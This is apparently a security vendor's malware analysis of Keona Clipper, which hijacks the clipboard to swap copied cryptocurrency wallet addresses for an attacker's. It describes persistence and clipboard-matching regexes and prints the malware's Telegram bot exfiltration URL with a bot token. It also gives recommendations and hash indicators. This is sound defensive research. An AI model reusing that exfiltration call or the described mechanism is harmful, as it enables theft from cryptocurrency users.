Cyble-Keona-Clipper

Keona Clipper Leverages Telegram for Anonymity

Evasive Malware Targeting Cryptocurrency Users

Clipper malware is a family of malicious programs targeting cryptocurrency users. It is used to hijack the clipboards of any infected systems; the clipboard is the buffer where the copied data is stored for copy-paste operations.

In this type of attack, when the victim copies the cryptocurrency wallet address, the clipper replaces the address in the clipboard with the wallet address provided by the attacker, resulting in the victim’s financial loss.

During our routine threat-hunting exercise, Cyble researchers came across a post advertising a new clipper malware, namely “Keona Clipper.” According to its developers, “the Keona clipper is unique and anonymous software wrapped in a Telegram bot with stealth and anonymity.” Additionally, the malware disguises itself as a system file and sends victim details to a Telegram bot.

Figure 1 – Keona Clipper Post in Dark web Forum

The malware can steal BTC, ETH, LTC, XMR, XLM, XRP, NEC, BCH, ZCASH, BNB, DASH, DOGE, USDT TRC20, and ADA coins. The malicious file disguises itself as a system file and performs clipper operation regardless of whether the Telegram bot is running or not. Keona Clipper is priced as shown below:

  • $49/month – Starter plan
  • $79/2 months – Standard plan (1 free replacement of any wallet)
  • $149/3 months – Advanced plan (3 free replacements of any wallet)

Through the course of our research, we have identified over 90 different samples related to the clipper malware since May 2022, indicating that the malware has been widely deployed in recent weeks.

Technical Analysis

The clipper sample Sha256: 8a5757981abcefbc9b76eb234dc2c8398f0542206daa08cac68a3951bcab37fe was taken for analysis. The sample is compiled using .NET and protected by Confuser 1.x.

Figure 2 – File Details of the Keona Clipper Malware

After unpacking the sample, the malware still uses some obfuscation techniques to evade detection by antivirus products. The below figure shows the obfuscated Main function.

Figure 3 – Obfuscated Main Function of the Keona Clipper Malware

Upon execution, the malware uses Telegram APIs to send the information about victims to its Telegram bot. It then uses the below URL to communicate with the Telegram bot.

The URL contains Telegram’s sendMessage() API along with a message “Произошёл запуск клиппера на компьютере” which translates to “clipper has started on the computer.”

hxxps://api[.]telegram[.]org/bot5336816444:AAFAhYDURZP9DwzoanjR7-8Twcs9p2MyOVA/sendMessage?chat_id=336872404&text= Произошёл запуск клиппера на компьютере: <user name> &parse_mode=Markdown&disable_web_page_preview=True

After sending the victim’s details, the clipper malware gets the below response:

Figure 4 – Response from the Telegram Bot

The clipper malware creates persistence by copying itself into different locations and creating startup entries in the registry. Initially, it copies itself into the Administrative Tools folder as csrss.exe.

Figure 5 – Keona Clipper Persistence Using Administrative Tools Folder

After this, the clipper malware creates persistence by copying itself into the startup location, as shown below.

Figure 6 – Keona Clipper Persistence Startup Location

The clipper also creates auto-start entries in the registry to ensure the malware runs whenever the system restarts. The image below shows the code used by the malware for creating the auto-start entries.

Figure 7 – Keona Clipper AutoStart Entries

The malware monitors the victims’ clipboard activity and gets the clipboard text using the Clipboard.GetText() function as shown below.

Figure 8 – Code to get Clipboard Data

After getting the clipboard text, the malware gets details of targeted cryptocurrencies and their corresponding regular expressions, which are hardcoded in the malware file.

The malware then runs the regular expression against the clipboard data and identifies the crypto wallet addresses. The below table shows the details of targeted cryptocurrencies and their regular expressions.

Crypto CurrenciesRegular Expression
BTC(?:^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$)
eth(?:^0x[a-fA-F0-9]{40,42}$)
xmr(?:^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$)
xlm(?:^G[0-9a-zA-Z]{55}$)
xrp(?:^r[0-9a-zA-Z]{24,34}$)
itc(?:^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$)
NEC(?:^A[0-9a-zA-Z]{33}$)
bch^((bitcoincash:)?(q|p)[a-z0-9]{41})
dash(?:^X[1-9A-HJ-NP-Za-km-z]{33}$)
trc20(?:^T[A-Za-z1-9]{33})
ADA(?:^addr[0-9-a-z]{99})
doge^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$
Zcasht1[0-9A-z]{33}
bnb(?:^bnb[0-9-a-z]{39})

After identifying the targeted crypto wallet address using a regular expression, the malware replaces it with a wallet address defined by the TA using the SetText() method. The below figure shows the transaction details of this wallet address.

Figure 9 – Transaction Details of the Wallet Address provided by the TA

Conclusion

People are investing, trading, and using cryptocurrency at an unprecedented scale, which is only bound to increase. Threat actors are thus constantly looking for new techniques to target crypto wallets.

Attacks like this are gaining popularity with threat actors whose main motivation is financial gain. Clipper malware and other similar malware are mostly dropped into the system using phishing campaigns. Malware such as Keona Clipper can also work as a backdoor into the infected system.

Organizations and individuals should thus continue to follow industry best cybersecurity practices to secure themselves and their firms.

Our Recommendations: 

  • Before submitting the cryptocurrency wallet information, verify the authenticity source.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices. 
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile. 
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.
  • Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs. 
  • Block URLs that could spread the malware, e.g., Torrent/Warez. 
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs. 
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems. 

MITRE ATT&CK® Techniques  

TacticTechnique IDTechnique Name
Initial AccessT1566Phishing
PersistenceT1547Boot or Logon Autostart Execution
Defence EvasionT1140Deobfuscate/Decode Files or Information
CollectionT1115Clipboard Data
Command and ControlT1071Application Layer Protocol

Indicators of Compromise (IoCs):   

IndicatorsIndicator typeDescription
9239ad089b529bebfd3125d10b2692f7 7e8469c6668731c49730f163118aadb5cd66d115 1d9c1e278c7621cd448d2dc2dfdee4b87c36cc19cbaf67065c31bd42e80e57feMD5 SHA-1 SHA-256  Keona Clipper
2604053e99fdcd1c778e6763292a6420 42bee73a646bc9bd51e3519c1b18895c9be308e9 b7c05f1755bb0c72970bc0c7e0baf74b78682d3b6ba7b20c5828f5f0c933829aMD5 SHA-1 SHA-256  Keona Clipper
fcd063a698fdbb668cb82d983573e99d 7f62e72089fa1434bbe5d1685efdf2a8b9fa5088 96c21bc7694dfa5abc0abca677a0d0c37d6e0ba9902bc64fbcd40446afcedd97MD5 SHA-1 SHA-256  Keona Clipper
d89da2a8ba803734a70c22f404f666af 0b334d85665377666b635d770f81a54e9ccc6123 0cc1b9f4fa23f9053435dc78a6f49ee5f0775d17f418c4500c80528c7e013660MD5 SHA-1 SHA-256  Keona Clipper
f60cff89cec8f49d355c2199e110bd62 2a8824f2c2eca4e5d0006c6d2c2bd502b838bc77 d9508a9490420811fb76d8802ecb8fd2ff7ae22a3bfb8db80ca8d7cd8eaf0e4eMD5 SHA-1 SHA-256  Keona Clipper
916eb02a393201a22bd63a06bbef8d6a 738febf36e3a38d27fad414892bf9e66e1b29a92 f29a4f4fa1b51d2c9a15e807f106a1bceb4674309b06381a6139c76a08fb543dMD5 SHA-1 SHA-256  Keona Clipper
d13a3819b3eede1ea8ca373d27bc94b9 35ddea9ea9faa41619c20a9d3b741cacfac910f9 4d74740bea7e62d1dccc19167d7d1b75fde50da7d17b1630b89def3b85edbf07MD5 SHA-1 SHA-256  Keona Clipper
10787899d07e09f86d447d74dbd3856a f4506a11ede7514568fdc22face2a63583f31a09 00c8fb844bf951cf75869c459fb5443c263dc427c4c36756701bce61cb8d26f3MD5 SHA-1 SHA-256  Keona Clipper
1cc578b47a90c69528c93396c821cd4e 30363ff8b289e5e8b90fe8637aaf6fd939378dba 3cb4684da133cc1c9791038c203eaf137e8faff2be91422a859f4cef535eedffMD5 SHA-1 SHA-256  Keona Clipper
247741c4fbb5f482a6f0d2e522fbda79 4eb2bd15ec574846202f74d8305a9b52cb6c8361 3aa6d602cc3c91db35da7cadfa361798acde82fef4e3edc6aa551b947dd98217MD5 SHA-1 SHA-256  Keona Clipper

Scroll to Top